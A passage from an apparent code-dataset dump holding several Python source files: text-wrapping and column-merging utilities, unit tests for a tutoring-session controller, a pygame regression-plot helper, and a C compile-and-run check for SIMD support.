{info.line_number} column {len_leading + info.column_number}: unindent does not match any outer indentation level\")\n info.leading = original_leading\n info.indent = indent\n if len_leading:\n info.column_number += len_leading\n line = lstripped\n\n yield (info, line)\n\n@_export\ndef lines_filter_empty_lines(li):\n \"\"\"\n A lines modifier function. Filters out the empty lines\n of a \"lines iterator\".\n\n Preserves the line numbers. If lines 0 through 2 are empty,\n line 3 is \"a\", line 4 is empty, and line 5 is \"b\",\n will yield:\n (3, \"a\")\n (5, \"b\")\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n for t in li:\n if not t[1]:\n continue\n yield t\n\n\n\n@_export\ndef wrap_words(words, margin=79, *, two_spaces=True):\n \"\"\"\n Combines 'words' into lines and returns the result as a string.\n Similar to textwrap.wrap.\n\n 'words' should be an iterator yielding str or bytes strings, and\n these strings should already be split at word boundaries.\n Here's an example of a valid argument for words:\n \"this is an example of text split at word boundaries\".split()\n\n A single '\\n' indicates a line break.\n If you want a paragraph break, embed two '\\n' characters in a row.\n\n 'margin' specifies the maximum length of each line. The length of\n every line will be less than or equal to 'margin', unless the length\n of an individual element inside 'words' is greater than 'margin'.\n\n If 'two_spaces' is true, elements from 'words' that end in\n sentence-ending punctuation ('.', '?', and '!') will be followed\n by two spaces, not one.\n\n Elements in 'words' are not modified; any leading or trailing\n whitespace will be preserved. You can use this to preserve\n whitespace where necessary, like in code examples.\n\n The objects yielded by words can be a subclass of either\n str or bytes, though wrap_words will only return str or bytes.\n All the objects yielded by words must have the same base class\n (str or bytes).\n \"\"\"\n words = iter(words)\n col = 0\n empty = None\n lastword = None\n text = []\n first_word = True\n\n for word in words:\n if first_word:\n first_word = False\n if isinstance(word, bytes):\n empty = lastword = b''\n sentence_ending_punctuation = (b'.', b'?', b'!')\n two_spaces = b' '\n one_space = b' '\n newline = b'\\n'\n else:\n empty = lastword = ''\n sentence_ending_punctuation = ('.', '?', '!')\n two_spaces = ' '\n one_space = ' '\n newline = '\\n'\n\n if word.isspace():\n lastword = word\n col = 0\n text.append(word)\n continue\n\n l = len(word)\n\n if two_spaces and lastword.endswith(sentence_ending_punctuation):\n space = two_spaces\n len_space = 2\n else:\n space = one_space\n len_space = 1\n\n if (l + len_space + col) > margin:\n if col:\n text.append(newline)\n col = 0\n elif col:\n text.append(space)\n col += len_space\n\n text.append(word)\n col += len(word)\n lastword = word\n\n if first_word:\n raise ValueError(\"no words to wrap\")\n return empty.join(text)\n\n\n\n_code_paragraph = \"code paragraph\"\n_text_paragraph = \"text paragraph\"\n\n@state.accessor()\nclass _column_wrapper_splitter:\n def __init__(self, is_bytes, tab_width, allow_code, code_indent, convert_tabs_to_spaces):\n # print(f\"\\n_column_wrapper_splitter({tab_width=}, {allow_code=}, {convert_tabs_to_spaces=})\")\n self.is_bytes = is_bytes\n if is_bytes:\n self.empty = b''\n self.tab_string = b'\\t'\n self.space_string = b' '\n self.newline_string = b'\\n'\n self.paragraph_string = b'\\n\\n'\n self.make_iterator = _iterate_over_bytes\n else:\n self.empty = ''\n self.tab_string = '\\t'\n self.space_string = ' '\n self.newline_string = '\\n'\n self.paragraph_string = '\\n\\n'\n self.make_iterator = iter\n self.tab_width = tab_width\n self.allow_code = allow_code\n self.code_indent = code_indent\n self.convert_tabs_to_spaces = convert_tabs_to_spaces\n\n self.words = []\n\n self.leading = []\n self.word = []\n self.code = []\n\n # used to regulate line and paragraph breaks.\n # can be _code_paragraph, _text_paragraph, or None.\n # (if None, we've already handled the appropriate break.)\n self.previous_paragraph = None\n\n self.state_manager = state.StateManager(self.state_initial)\n\n def emit(self, c):\n # print(f\" [emit]\", repr(c))\n self.words.append(c)\n\n def line_break(self):\n # print(f\" [ \\\\n]\")\n self.words.append(self.newline_string)\n\n def paragraph_break(self):\n # print(f\" [\\\\n\\\\n]\")\n self.words.append(self.paragraph_string)\n\n def write(self, c):\n # write consumes c and makes calls as appropriate to\n # self.state().\n #\n # first, write aggregates together all consecutive\n # non-line-breaking whitespace characters, which it\n # stores in 'leading'. if the next character is\n # a newline, it passes that single newline as 'word'.\n # otherwise it aggregates all consecutive non-whitespace\n # characters together, and passes those in as 'word'.\n #\n # thus we only call self.state() with two types of 'word':\n # * a word, which is non-whitespace, and\n # * a single '\\n'.\n # all other whitespace is passed in as 'leading'.\n #\n # so for example, this input:\n #\n # 'hello there\\nhow are you?\\n\\n \\n\\ti am fine.\\n so there!'\n #\n # will result in self.state being called with these words,\n # and with whitespace being set to these values:\n # leading word\n # ------- ------\n # '' 'hello'\n # ' ' 'there'\n # '' '\\n'\n # '' 'how'\n # ' ' 'are'\n # ' ' 'you?'\n # '' '\\n'\n # '' '\\n'\n # ' ' '\\n'\n # '\\t' 'i'\n # ' ' 'am'\n # ' ' 'fine.'\n # '' '\\n'\n # ' ' 'so'\n # ' ' 'there!'\n #\n # consecutive calls to write() behave the same as calling write()\n # once with both inputs concatenated together. this:\n # self.write('abc')\n # self.write('def')\n # is the same as calling\n # self.write('abcdef')\n #\n # you should call close() after the last write() call.\n\n leading = self.leading\n word = self.word\n write_word = None\n write_newline = False\n append_c_to_leading = False\n empty = self.empty\n newline_string = self.newline_string\n\n # print(f\"<{c!r}> \", end='')\n\n if not c.isspace():\n word.append(c)\n return\n\n if word:\n write_word = empty.join(word)\n word.clear()\n\n if c == newline_string:\n if write_word:\n write_newline = True\n else:\n write_word = c\n else:\n append_c_to_leading = True\n\n if write_word:\n if leading:\n l = empty.join(leading)\n leading.clear()\n else:\n l = empty\n\n self.state(l, write_word)\n write_word = None\n\n if write_newline:\n self.state(empty, newline_string)\n write_newline = False\n\n if append_c_to_leading:\n leading.append(c)\n append_c_to_leading = False\n\n def close(self):\n # flush the current word, if any.\n if self.word:\n empty = self.empty\n self.state(empty.join(self.leading), empty.join(self.word))\n self.leading.clear()\n self.word.clear()\n\n def state_paragraph_start(self, leading, word):\n \"\"\"\n Initial state. Also the state we return to\n after encountering two '\\n's in a row after\n a text line.\n \"\"\"\n if word == self.newline_string:\n return\n if self.previous_paragraph:\n self.paragraph_break()\n self.previous_paragraph = None\n self.state = self.state_line_start\n self.state(leading, word)\n\n state_initial = state_paragraph_start\n\n def state_line_start(self, leading, word):\n if word == self.newline_string:\n # two '\\n's in a row.\n if self.previous_paragraph == _code_paragraph:\n # we could still be in a code block.\n # remember the whitespace and continue.\n # we don't need to save the leading whitespace.\n self.code.append(word)\n return\n\n self.state = self.state_paragraph_start\n return\n\n if self.allow_code:\n col = 0\n tab_width = self.tab_width\n for c in self.make_iterator(leading):\n if c == self.tab_string:\n col = col + tab_width - (col % tab_width)\n elif c == self.space_string:\n col += 1\n else:\n raise RuntimeError(\"unhandled whitespace character \" + repr(c))\n if col >= self.code_indent:\n # code line!\n if self.previous_paragraph == _text_paragraph:\n self.paragraph_break()\n assert not self.code\n else:\n if self.code:\n for c in self.code:\n self.line_break()\n self.code.clear()\n\n self.state = self.state_code_line_start\n self.state(leading, word)\n return\n\n if self.previous_paragraph == _code_paragraph:\n self.paragraph_break()\n self.state = self.state_text_line_start\n self.state(leading, word)\n\n def state_text_line_start(self, leading, word):\n self.previous_paragraph = _text_paragraph\n self.state = self.state_in_text_line\n self.state(leading, word)\n\n def state_in_text_line(self, leading, word):\n if word == self.newline_string:\n self.state = self.state_line_start\n return\n self.emit(word)\n\n def state_code_line_start(self, leading, word):\n self.previous_paragraph = _code_paragraph\n self.col = 0\n self.state = self.state_in_code_line\n self.state(leading, word)\n\n def state_in_code_line(self, leading, word):\n if word == self.newline_string:\n self.emit(self.empty.join(self.code))\n self.code.clear()\n self.state = self.state_line_start\n self.state(self.empty, word)\n return\n\n tab_width = self.tab_width\n convert_tabs_to_spaces = self.convert_tabs_to_spaces\n col = self.col\n tab_string = self.tab_string\n space_string = self.space_string\n for c in self.make_iterator(leading):\n if c == tab_string:\n delta = tab_width - (col % tab_width)\n col += delta\n if convert_tabs_to_spaces:\n self.code.append(space_string * delta)\n else:\n self.code.append(c)\n elif c == space_string:\n col += 1\n self.code.append(c)\n else:\n raise RuntimeError(\"unhandled whitespace character \" + repr(c))\n self.code.append(word)\n self.col = col + len(word)\n\n\n\n@_export\ndef split_text_with_code(s, *, tab_width=8, allow_code=True, code_indent=4, convert_tabs_to_spaces=True):\n \"\"\"\n Splits the string s into individual words,\n suitable for feeding into wrap_words.\n\n s may be either str or bytes.\n\n Paragraphs indented by less than code_indent will be\n broken up into individual words.\n\n If `allow_code` is true, paragraphs indented by at least\n code_indent spaces will preserve their whitespace:\n internal whitespace is preserved, and the newline is\n preserved. (This will preserve the formatting of code\n examples, when these words are rejoined into lines\n by wrap_words.)\n\n s can be str, bytes, or a subclass of either, though\n split_text_with_code will only return str or bytes.\n\n if s is empty, returns a list containing an empty string.\n \"\"\"\n is_bytes = isinstance(s, bytes)\n if is_bytes:\n iterable = _iterate_over_bytes(s)\n empty = b''\n else:\n iterable = s\n empty = ''\n\n cws = _column_wrapper_splitter(is_bytes, tab_width, allow_code, code_indent, convert_tabs_to_spaces)\n\n for c in iterable:\n cws.write(c)\n cws.close()\n return_value = cws.words\n if not return_value:\n return [empty]\n return return_value\n\n\n@_export\nclass OverflowStrategy(enum.Enum):\n \"\"\"\n Enum providing constants to specify how merge_columns\n handles overflow in columns.\n \"\"\"\n INVALID = enum.auto()\n RAISE = enum.auto()\n INTRUDE_ALL = enum.auto()\n # INTRUDE_MINIMUM = enum.auto() # not implemented yet\n DELAY_ALL = enum.auto()\n # DELAY_MINIMUM = enum.auto() # not implemented yet\n\n@_export\ndef merge_columns(*columns, column_separator=None,\n overflow_strategy=OverflowStrategy.RAISE,\n overflow_before=0,\n overflow_after=0,\n ):\n \"\"\"\n Merge n column tuples, with each column tuple being\n formatted into its own column in the resulting string.\n Returns a string.\n\n columns should be an iterable of column tuples.\n Each column tuple should contain three items:\n (text, min_width, max_width)\n text should be a single string, either str or bytes,\n with newline characters separating lines. min_width\n and max_width are the minimum and maximum permissible\n widths for that column, not including the column\n separator (if any).\n\n Note that this function doesn't text-wrap the lines.\n\n column_separator is printed between every column.\n\n overflow_strategy tells merge_columns how to handle a column\n with one or more lines that are wider than that column's max_width.\n The supported values are:\n\n OverflowStrategy.RAISE\n\n Raise an OverflowError. The default.\n\n OverflowStrategy.INTRUDE_ALL\n\n Intrude into all subsequent columns on all lines\n where the overflowed column is wider than its max_width.\n\n OverflowStrategy.DELAY_ALL\n\n Delay all columns after the overflowed column,\n not beginning any until after the last overflowed line\n in the overflowed column.\n\n When overflow_strategy is INTRUDE_ALL or DELAY_ALL, and\n either overflow_before or overflow_after is nonzero, these\n specify the number of extra lines before or after\n the overflowed lines in a column.\n\n text and column_separator can be str, bytes, or a subclass\n of either, though merge_columns will only return str or bytes.\n All these objects (text and column_separator) must have the\n same baseclass, str or bytes.\n \"\"\"\n assert overflow_strategy in (OverflowStrategy.INTRUDE_ALL, OverflowStrategy.DELAY_ALL, OverflowStrategy.RAISE)\n raise_overflow_error = overflow_strategy == OverflowStrategy.RAISE\n delay_all = overflow_strategy == OverflowStrategy.DELAY_ALL\n\n assert columns\n is_bytes = isinstance(columns[0][0], bytes)\n\n if is_bytes:\n empty = b''\n space = b' '\n newline = b'\\n'\n else:\n empty = ''\n space = ' '\n newline = '\\n'\n\n if column_separator is None:\n column_separator = space\n\n _columns = columns\n columns = []\n empty_columns = []\n last_too_wide_lines = []\n max_lines = -1\n\n column_spacing = len(column_separator)\n\n for column_number, (s, min_width, max_width) in enumerate(_columns):\n\n # check types, let them raise exceptions as needed\n operator.index(min_width)\n operator.index(max_width)\n\n empty_columns.append(max_width * space)\n\n if isinstance(s, (str, bytes)):\n lines = s.rstrip().split(newline)\n else:\n lines = s\n max_lines = max(max_lines, len(lines))\n\n # loop 1:\n # measure each line length, determining\n # * maximum line length, and\n # * all overflow lines\n rstripped_lines = []\n overflows = []\n max_line_length = -1\n in_overflow = False\n\n def add_overflow():\n nonlocal in_overflow\n in_overflow = False\n if overflows:\n last_overflow = overflows[-1]\n if last_overflow[1] >= (overflow_start - 1):\n overflows.pop()\n overflows.append((last_overflow[0], overflow_end))\n return\n overflows.append((overflow_start, overflow_end))\n\n for line_number, line in enumerate(lines):\n line = line.rstrip()\n assert not newline in line\n rstripped_lines.append(line)\n\n length = len(line)\n max_line_length = max(max_line_length, length)\n\n line_overflowed = length > max_width\n if (not in_overflow) and line_overflowed:\n # starting new overflow\n if raise_overflow_error:\n raise OverflowError(f\"overflow in column {column_number}: {line!r} is {length} characters, column max_width is {max_width}\")\n overflow_start = max(line_number - overflow_before, 0)\n in_overflow = True\n elif in_overflow and (not line_overflowed):\n # ending current overflow\n overflow_end = line_number - 1 + overflow_after\n add_overflow()\n\n if in_overflow:\n overflow_end = line_number + overflow_after\n add_overflow()\n for i in range(overflow_after):\n rstripped_lines.append(empty)\n\n if delay_all and overflows:\n overflows.clear()\n overflows.append((0, overflow_end))\n\n # loop 2:\n # compute padded lines and in_overflow for every line\n padded_lines = []\n overflows.reverse()\n overflow_start = overflow_end = None\n def next_overflow():\n nonlocal overflow_start\n nonlocal overflow_end\n if overflows:\n overflow_start, overflow_end = overflows.pop()\n else:\n overflow_start = overflow_end = sys.maxsize\n\n in_overflow = False\n next_overflow()\n for line_number, line in enumerate(lines):\n if line_number > overflow_end:\n in_overflow = False\n next_overflow()\n if line_number >= overflow_start:\n in_overflow = True\n if not in_overflow:\n line = line.ljust(max_width)\n padded_lines.append((line, in_overflow))\n\n columns.append(padded_lines)\n\n\n column_iterators = [iter(c) for c in columns]\n lines = []\n\n while True:\n line = []\n all_iterators_are_exhausted = True\n add_separator = False\n in_overflow = False\n for column_iterator, empty_column in zip(column_iterators, empty_columns):\n if add_separator:\n line.append(column_separator)\n else:\n add_separator = True\n\n try:\n column, in_overflow = next(column_iterator)\n all_iterators_are_exhausted = False\n except StopIteration:\n column = empty_column\n line.append(column)\n if in_overflow:\n break\n if all_iterators_are_exhausted:\n break\n line = empty.join(line).rstrip()\n lines.append(line)\n\n text = newline.join(lines)\n return text.rstrip()\n\n@_export\ndef int_to_words(i, flowery=True, ordinal=False):\n \"\"\"\n Converts an integer into the equivalent English string.\n\n int_to_words(2) -> \"two\"\n int_to_words(35) -> \"thirty-five\"\n\n If the keyword-only parameter \"flowery\" is true,\n you also get commas and the word \"and\" where you'd expect them.\n (When \"flowery\" is True, int_to_words(i) produces identical\n output to inflect.engine().number_to_words(i).)\n\n If the keyword-only parameter \"ordinal\" is true,\n the string produced describes that *ordinal* number\n (instead of that *cardinal* number). Ordinal numbers\n describe position, e.g. where a competitor placed in a\n competition. int_to_words(1) returns the string 'one',\n but int_to_words(1, ordinal=True) returns the string 'first'.\n\n Numbers >= 10*75 (one quadrillion vigintillion)\n are only converted using str(i). Sorry!\n \"\"\"\n if not isinstance(i, int):\n raise ValueError(\"i must be int\")\n\n if (i >= 10**75) or (i <= -10**75):\n return str(i)\n\n is_negative = i < 0\n if is_negative:\n i = -i\n\n if ordinal:\n first_twenty = (\n \"zeroth\",\n \"first\", \"second\", \"third\", \"fourth\", \"fifth\",\n \"sixth\", \"seventh\", \"eighth\", \"ninth\", \"tenth\",\n \"eleventh\", \"twelveth\", \"thirteenth\", \"fourteenth\", \"fifteenth\",\n \"sixteenth\", \"seventeenth\", \"eighteenth\", \"nineteenth\",\n )\n else:\n first_twenty = (\n \"zero\",\n \"one\", \"two\", \"three\", \"four\", \"five\",\n \"six\", \"seven\", \"eight\", \"nine\", \"ten\",\n \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\",\n )\n\n tens = (\n None, None, \"twenty\", \"thirty\", \"forty\", \"fifty\",\n \"sixty\", \"seventy\", \"eighty\", \"ninety\",\n )\n\n strings = []\n append = strings.append\n spacer = ''\n\n # go-faster stripes shortcut:\n # most numbers are small.\n # the fastest route is for numbers < 100.\n # the next-fastest is for numbers < 1 trillion.\n # the slow route handles numbers < 10**66.\n if i >= 100:\n if i >= 10**12:\n quantities = (\n # note! v leading spaces!\n (10**63, \" vigintillion\"),\n (10**60, \" novemdecillion\"),\n (10**57, \" octodecillion\"),\n (10**54, \" septdecillion\"),\n (10**51, \" sexdecillion\"),\n (10**48, \" qindecillion\"),\n (10**45, \" quattuordecillion\"),\n (10**42, \" tredecillion\"),\n (10**39, \" duodecillion\"),\n (10**36, \" undecillion\"),\n (10**33, \" decillion\"),\n (10**30, \" nonillion\"),\n (10**27, \" octillion\"),\n (10**24, \" septillion\"),\n (10**21, \" sextillion\"),\n (10**18, \" quintillion\"),\n (10**15, \" quadrillion\"),\n (10**12, \" trillion\"),\n (10** 9, \" billion\"),\n (10** 6, \" million\"),\n (10** 3, \" thousand\"),\n (10** 2, \" hundred\"),\n )\n else:\n quantities = (\n # note! v leading spaces!\n (10** 9, \" billion\"),\n (10** 6, \" million\"),\n (10** 3, \" thousand\"),\n (10** 2, \" hundred\"),\n )\n\n for threshold, english in quantities:\n if i >= threshold:\n upper = i // threshold\n i = i % threshold\n append(spacer)\n append(int_to_words(upper, flowery=flowery))\n append(english)\n spacer = ', ' if flowery else ' '\n\n if strings:\n spacer = \" and \" if flowery else \" \"\n\n if i >= 20:\n t = i // 10\n append(spacer)\n append(tens[t])\n spacer = '-'\n i = i % 10\n\n # don't add \"zero\" to the end if we already have strings\n if i or (not strings):\n append(spacer)\n append(first_twenty[i])\n elif ordinal and strings:\n if strings[-1][-1] == 'y':\n s = strings.pop()\n strings.append(s[:-1] + \"ie\")\n strings.append(\"th\")\n\n if is_negative:\n strings.insert(0, \"negative \")\n\n return \"\".join(strings)\n\n","repo_name":"larryhastings/big","sub_path":"big/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":113954,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"21"} +{"seq_id":"20607762305","text":"import smtplib\n\nfrom testutils import EnseignerTestCase\n\nimport enseigner.model as model\nimport enseigner.emails as emails\nimport enseigner.controller as controller\n\nclass ControllerTestCase(EnseignerTestCase):\n def testCreateSession(self):\n sub1 = model.Subject.create('foo', False)\n sub2 = model.Subject.create('bar', True)\n sub3 = model.Subject.create('baz', False)\n s1 = controller.create_session('24/12/2014 22:55', ['qux', 'quux'])\n s2 = controller.create_session('24/12/2014 22:55', ['corge'])\n self.assertEqual({x.name for x in model.Subject.all()},\n {'foo', 'bar', 'baz', 'qux', 'quux', 'corge'})\n self.assertEqual({x.name for x in model.SessionSubject.all_subjects_for_session(s1)},\n {'foo', 'bar', 'baz', 'qux', 'quux'})\n self.assertEqual({x.name for x in model.SessionSubject.all_subjects_for_session(s2)},\n {'foo', 'bar', 'baz', 'corge'})\n\n def testTutorSubscription(self):\n sub1 = model.Subject.create('foo', False)\n sub2 = model.Subject.create('bar', True)\n sub3 = model.Subject.create('baz', False)\n t1 = model.Tutor.create('foo', 'bar', 'baz', False)\n t2 = model.Tutor.create('foo2', 'bar', 'baz', False)\n s1 = controller.create_session('26/12/2014 20:50', ['qux', 'quux'])\n s2 = controller.create_session('26/12/2014 20:50', ['corge'])\n sub4 = [x for x in model.SessionSubject.all_subjects_for_session(s1) if x.name == 'qux'][0]\n h = controller.hash_subscription_params(s1.sid, 'tutor', t1.uid)\n self.assertEqual(controller.get_tutor_form_data(str(s1.sid), str(t1.uid), h),\n (t1, set(), 0, ''))\n self.assertRaises(controller.WrongHash,\n controller.get_tutor_form_data, str(s1.sid), str(t1.uid), '')\n controller.set_tutor_form_data(str(s1.sid), str(t1.uid), h, [(str(sub1.sid), 1), (str(sub4.sid), 2)], 3, 'qux')\n d = controller.get_tutor_form_data(str(s1.sid), str(t1.uid), h)\n self.assertEqual(d.tutor.email, 'foo')\n self.assertEqual(d.tutor.name, 'bar')\n self.assertEqual({x[0].name for x in d.subjects}, {'foo', 'qux'})\n self.assertEqual(d.group_size, 3)\n self.assertEqual(d.comment, 'qux')\n self.assertRaises(controller.WrongHash,\n controller.get_tutor_form_data, str(s1.sid), str(t1.uid), '')\n\n controller.set_tutor_form_data(str(s1.sid), str(t1.uid), h, [(str(sub1.sid), 1), (str(sub3.sid), 2)], 4, 'quux')\n (tutor, subjects, group_size, comment) = controller.get_tutor_form_data(str(s1.sid), str(t1.uid), h)\n self.assertEqual(tutor.email, 'foo')\n self.assertEqual(tutor.name, 'bar')\n self.assertEqual({x[0].name for x in subjects}, {'foo', 'baz'})\n self.assertEqual(group_size, 4)\n self.assertEqual(comment, 'quux')\n\n def testStudentSubscription(self):\n sub1 = model.Subject.create('foo', False)\n sub2 = model.Subject.create('bar', True)\n sub3 = model.Subject.create('baz', False)\n st1 = model.Student.create('foo', 'bar', '', False)\n st2 = model.Student.create('foo2', 'bar2', '', False)\n s1 = controller.create_session('27/12/2014 11:47', ['qux', 'quux'])\n s2 = controller.create_session('27/12/2014 11:47', ['corge'])\n sub4 = [x for x in model.SessionSubject.all_subjects_for_session(s1) if x.name == 'qux'][0]\n h = controller.hash_subscription_params(s1.sid, 'student', st1.uid)\n self.assertEqual(controller.get_student_form_data(str(s1.sid), str(st1.uid), h),\n (st1, None, 0, ''))\n self.assertRaises(controller.WrongHash,\n controller.get_tutor_form_data, str(s1.sid), str(st1.uid), '')\n controller.set_student_form_data(str(s1.sid), str(st1.uid), h, str(sub1.sid), 3, 'qux')\n d = controller.get_student_form_data(str(s1.sid), str(st1.uid), h)\n self.assertEqual(d.student.emails, 'foo')\n self.assertEqual(d.student.name, 'bar')\n self.assertEqual(d.subject.name, 'foo')\n self.assertEqual(d.friends, 3)\n self.assertEqual(d.comment, 'qux')\n self.assertRaises(controller.WrongHash,\n controller.get_student_form_data, str(s1.sid), str(st1.uid), '')\n\n controller.set_student_form_data(str(s1.sid), str(st1.uid), h, str(sub3.sid), 4, 'quux')\n (student, subject, friends, comment) = controller.get_student_form_data(str(s1.sid), str(st1.uid), h)\n self.assertEqual(student.emails, 'foo')\n self.assertEqual(student.name, 'bar')\n self.assertEqual(subject.name, 'baz')\n self.assertEqual(friends, 4)\n self.assertEqual(comment, 'quux')\n\n def testSendTutorEmailSuccess(self):\n s1 = controller.create_session('28/12/2014 12:17', [])\n t1 = model.Tutor.create('foo', 'bar', 'baz', False)\n t2 = model.Tutor.create('foo2', 'bar2', 'baz', False)\n self.assertEqual(controller.send_tutor_email(s1, lambda x:'f', 'toto', 'titi $nom_tuteur'), [])\n self.assertEqual(set(emails.MockSender.queue), {\n ('foo', 'toto', 'titi bar'),\n ('foo2', 'toto', 'titi bar2')\n })\n\n def testSendTutorEmailError(self):\n s1 = controller.create_session('28/12/2014 12:17', [])\n t1 = model.Tutor.create('foo', 'bar', 'baz', False)\n t2 = model.Tutor.create('foo2', 'bar2', 'baz', False)\n errored = set()\n original_send = emails.MockSender.send\n def fakesend(self, recipient, subject, content):\n errored.add((recipient, subject, content))\n emails.MockSender.send = original_send\n raise smtplib.SMTPException()\n emails.MockSender.send = fakesend\n errors = controller.send_tutor_email(s1, lambda x:'f', 'toto', 'titi $nom_tuteur')\n self.assertEqual(len(errors), 1, errors)\n self.assertTrue(errored)\n self.assertEqual(set(emails.MockSender.queue), {\n ('foo', 'toto', 'titi bar'),\n ('foo2', 'toto', 'titi bar2')\n } - errored)\n","repo_name":"progval/site-enseigner","sub_path":"tests/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17855860023","text":"\"\"\" April 18, 2021 \"\"\"\n\nimport pygame\nimport numpy as np\nfrom setup.settings import Settings\n\n\nclass Arr:\n\n def __init__(self):\n pygame.init()\n self.set = Settings()\n\n ## Fundamental anchors -- directly equate to the arr min and max\n self.pixel_origin = (200, 850)\n self.pixel_w = 1200\n self.pixel_h = 700\n\n ## How many labels to divide each axis into\n self.x_num_labels = 17 ## Gives shorter floats\n self.y_num_labels = 15\n\n ### Pixel units\n self.configure_pixel_scale()\n\n ### Array units\n self.arr = np.load('data/basic_arr.npy')\n self.configure_arr()\n self.configure_arr_scale()\n\n\n ### Agnostic units\n self.configure_conversion_factor()\n self.get_centroid()\n\n self.buffer = 50\n self.configure_false_axes()\n\n self.regression()\n self.get_pixels_of_arr()\n\n\n \"\"\" CONFIGURATION STUFF \"\"\"\n\n ### PIXELS\n def configure_pixel_scale(self):\n\n # Set pixel min/max\n self.pixel_x_min, self.pixel_y_max = self.pixel_origin\n self.pixel_x_max = self.pixel_x_min + self.pixel_w\n self.pixel_y_min = self.pixel_y_max - self.pixel_h\n\n self.pixel_x_scale = np.linspace( (self.pixel_x_min), (self.pixel_x_max), self.x_num_labels )\n self.pixel_y_scale = np.linspace( (self.pixel_y_max), (self.pixel_y_min), self.y_num_labels )\n\n\n ### ARR\n def configure_arr(self):\n # Set arr min/max\n x, y = self.arr[:,0], self.arr[:,1]\n self.arr_x_min, self.arr_x_max = x.min(), x.max()\n self.arr_y_min, self.arr_y_max = y.min(), y.max()\n\n self.arr_origin = (self.arr_x_min, self.arr_y_min)\n\n def configure_arr_scale(self):\n self.arr_x_scale = np.linspace( self.arr_x_min, self.arr_x_max, self.x_num_labels )\n self.arr_y_scale = np.linspace( self.arr_y_min, self.arr_y_max, self.y_num_labels )\n\n\n\n \"\"\" CONVERSION STUFF \"\"\"\n\n def configure_conversion_factor(self):\n ## X\n # Pick the element from the same index location in each scale\n arr_x = self.arr_x_scale[7]\n arr_y = self.arr_y_scale[7]\n pixel_x = self.pixel_x_scale[7]\n pixel_y = self.pixel_y_scale[7]\n\n # Zero these\n arr_x -= self.arr_x_min\n arr_y -= self.arr_y_min\n pixel_x -= self.pixel_x_min\n pixel_y = self.pixel_y_max - pixel_y\n\n # Get conversion factor\n self.x_to_arr = arr_x / pixel_x\n self.y_to_arr = arr_y / pixel_y\n\n # Reverse direction = inverse\n self.x_to_pixels = 1 / self.x_to_arr\n self.y_to_pixels = 1 / self.y_to_arr\n\n\n def convert_to_arr(self, pixel_coords):\n x, y = pixel_coords\n\n ## Zero the passed coord\n x -= self.pixel_x_min\n y = self.pixel_y_max - y\n\n ### Convert\n x *= self.x_to_arr\n y *= self.y_to_arr\n\n ### Add back the zero coord in arr units\n x += self.arr_x_min\n y += self.arr_y_min\n\n return x, y\n\n\n def convert_to_pixels(self, arr_coords):\n x, y = arr_coords\n\n ## Find x, y values relative to arr origin\n x -= self.arr_x_min\n y -= self.arr_y_min\n\n ## Scale those values to be pixels\n x *= self.x_to_pixels\n y *= self.y_to_pixels\n\n ## Find x, y values relative to arr origin\n x += self.pixel_x_min\n y = self.pixel_y_max - y\n\n return int(x), int(y) ## Pixel values should be int\n\n\n def get_centroid(self):\n x = self.arr[:,0].mean()\n y = self.arr[:,1].mean()\n\n self.arr_centroid = [x, y]\n self.pixel_centroid = list( self.convert_to_pixels( (x, y) ) )\n\n\n def get_pixels_of_arr(self):\n arr = []\n for coord in self.arr:\n pixels = self.convert_to_pixels(coord)\n arr.append( tuple(pixels) )\n\n self.pixels_of_arr = tuple(arr)\n\n\n\n \"\"\" FIND COEFFICIENTS AND SSE FOR BEST-FIT LINE \"\"\"\n def regression(self):\n x_mean, y_mean = self.arr_centroid\n x_dev = self.arr[:,0] - x_mean\n y_dev = self.arr[:,1] - y_mean\n\n numerator = (x_dev * y_dev).sum()\n denom = (x_dev**2).sum()\n\n self.b1 = numerator/denom\n self.b0 = y_mean - self.b1*x_mean\n\n pred = self.b0 + (self.b1 * self.arr[:,0])\n error = self.arr[:,1] - pred\n squared_error = error**2\n self.SSE = squared_error.sum()\n\n\n\n \"\"\" UTILITY \"\"\"\n def configure_false_axes(self):\n\n x, y = self.pixel_origin\n\n self.false_axes_origin = (x - self.buffer, y + self.buffer)\n self.false_axis_w = self.pixel_w + (2 * self.buffer)\n self.false_axis_h = self.pixel_h + (2 * self.buffer)\n","repo_name":"Biuku/LinearRegressionGame","sub_path":"arr.py","file_name":"arr.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"11151667000","text":"import distutils.ccompiler\nimport os\nimport random\nimport subprocess\n\n\"\"\"\nThese classes allow a test to see if source code with the C compiler actually\ncompiles.\n\"\"\"\n\nDEFAULT_COMPILER = distutils.ccompiler.get_default_compiler()\n\nC_EXTENSION = \".c\"\n\ndef create_file_with_rand_name(source):\n cur_dir = os.getcwd()\n rand_file = os.path.join(cur_dir, \"c_\" + str(random.getrandbits(72)))\n while os.path.exists(rand_file):\n rand_file = os.path.join(cur_dir, \"c_\" + str(random.getrandbits(72)))\n with open(rand_file + C_EXTENSION, \"w\") as c_file:\n c_file.write(source)\n return rand_file\n\nclass CheckCCompiles(object):\n\n def __init__(self, name = \"\", source_code = \"\"):\n self.name = name\n self.source_code = source_code\n self.compiler = distutils.ccompiler.new_compiler()\n if DEFAULT_COMPILER == 'unix':\n # The idea here is that we want to have the compiler try and generate all the possible\n # simd instructions, then see by running it, if we get an illegal hardware instruction\n self.extra_args = [\"-m\" + self.name]\n elif DEFAULT_COMPILER == 'msvc':\n self.extra_args = ['/arch:AVX', '/arch:AVX2', '/arch:AVX512']\n else:\n self.extra_args = []\n self.works = False\n\n def try_run(self):\n try:\n self.run_result = subprocess.run(self.file_name, check=False)\n self.works = self.run_result.returncode == 0\n except Exception:\n self.works = False\n return self.works\n \n def __enter__(self):\n self.file_name = create_file_with_rand_name(self.source_code)\n self.c_name = self.file_name + C_EXTENSION\n try:\n self.obj_names = self.compiler.compile([self.c_name], extra_preargs=self.extra_args)\n except Exception as exc:\n print(\"FAILED \" + self.name + \" compile check: \" + str(exc))\n return self\n self.compiles = True\n try:\n self.compiler.link_executable(self.obj_names, self.file_name)\n except Exception as 